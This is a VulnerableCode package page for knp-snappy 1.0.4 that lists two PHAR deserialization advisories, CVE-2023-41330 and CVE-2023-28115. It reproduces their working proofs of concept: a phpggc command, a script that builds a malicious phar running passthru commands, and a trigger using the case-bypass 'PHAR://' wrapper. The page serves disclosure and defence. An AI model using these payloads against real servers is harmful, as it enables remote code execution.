VulnerableCode Package Details - pkg:composer/knplabs/knp-snappy@1.0.4

Search for packages

Package details: pkg:composer/knplabs/knp-snappy@1.0.4

Essentials
History (4)

purl	pkg:composer/knplabs/knp-snappy@1.0.4
Tags	Ghost

Next non-vulnerable version	None.
Latest non-vulnerable version	None.
Risk	4.5

Vulnerabilities affecting this package (2)

Vulnerability	Summary	Fixed by
VCID-1auv-z9xv-53c8 Aliases: CVE-2023-41330 GHSA-92rv-4j2h-8mjj	Snappy PHAR deserialization vulnerability ## Issue On March 17th the vulnerability [CVE-2023-28115 was disclosed](https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc), allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the `phar://` wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the `phar://` string, it can be bypassed to achieve remote code execution again using a different case. As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the `phar://` wrapper. ## Technical details ### Description The following [patch](https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6) was committed on the 1.4.2 release to fix CVE-2023-28115. ![patch](https://user-images.githubusercontent.com/110113034/250088710-396f562d-d19e-43a5-a8f8-90ca1f7e3e98.png) If the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. ### Proof of Concept To illustrate the vulnerability, the `/tmp/exploit` file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using [phpggc](https://github.com/ambionics/phpggc) with the `-f` option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called. ```bash $ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar ``` The following `index.php` file will be used to trigger the vulnerability via the payload `PHAR://exploit.phar`. ```bash <?php // index.php // include autoloader require __DIR__ . '/vendor/autoload.php'; // reference the snappy namespace use Knp\Snappy\Pdf; $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); $snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar'); ``` Finally once executed, the `/tmp/exploit` file is successfully created on the filesystem. ```bash $ php index.php Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634 Stack trace: #0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false) #1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false) #2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false) #3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar') #4 {main} thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634 $ ls -l /tmp/exploit -rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit ``` This proof of concept is based on the original one published with CVE-2023-28115. ### Impact A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. ## Patches Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers `http://`, `https://` or `file://` be available on the function `generateFromHtml()`. ## Workarounds Control user data submitted to the function `AbstractGenerator->generate(...)` ## References https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc ## Credits Rémi Matasse of Synacktiv (https://synacktiv.com/).	1.4.3 Affected by 0 other vulnerabilities.
VCID-r9m5-vhxg-e7ew Aliases: CVE-2023-28115 GHSA-gq6w-q6wh-jggc	PHAR deserialization allowing remote code execution ## Description snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. ## Proof of Concept Install Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code. ```php <?php // index.php // include autoloader require __DIR__ . '/vendor/autoload.php'; // reference the snappy namespace use Knp\Snappy\Pdf; // vulnerable object class VulnerableClass { public $fileName; public $callback; function __destruct() { call_user_func($this->callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php <?php // generate_phar.php class VulnerableClass { } // Create a new instance of the Dummy class and modify its property $dummy = new VulnerableClass(); $dummy->callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); // Add a new file in the archive with "text" as its content $poc["file"] = "text"; // Add the dummy object to the metadata. This will be serialized $poc->setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?> ``` Then run these command to generate the file ```php php --define phar.readonly=0 generate_phar.php ``` Then execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick. ## Impact This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. ## Occurences <https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670> ## References - <https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/>	1.4.2 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}

Vulnerabilities fixed by this package (0)

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2025-08-01T11:19:21.054837+00:00	GitLab Importer	Affected by	VCID-1auv-z9xv-53c8	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/knplabs/knp-snappy/CVE-2023-41330.yml	37.0.0
2025-08-01T11:03:46.793526+00:00	GitLab Importer	Affected by	VCID-r9m5-vhxg-e7ew	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/knplabs/knp-snappy/CVE-2023-28115.yml	37.0.0
2025-08-01T09:29:22.425278+00:00	GHSA Importer	Affected by	VCID-1auv-z9xv-53c8	https://github.com/advisories/GHSA-92rv-4j2h-8mjj	37.0.0
2025-08-01T09:22:48.764556+00:00	GHSA Importer	Affected by	VCID-r9m5-vhxg-e7ew	https://github.com/advisories/GHSA-gq6w-q6wh-jggc	37.0.0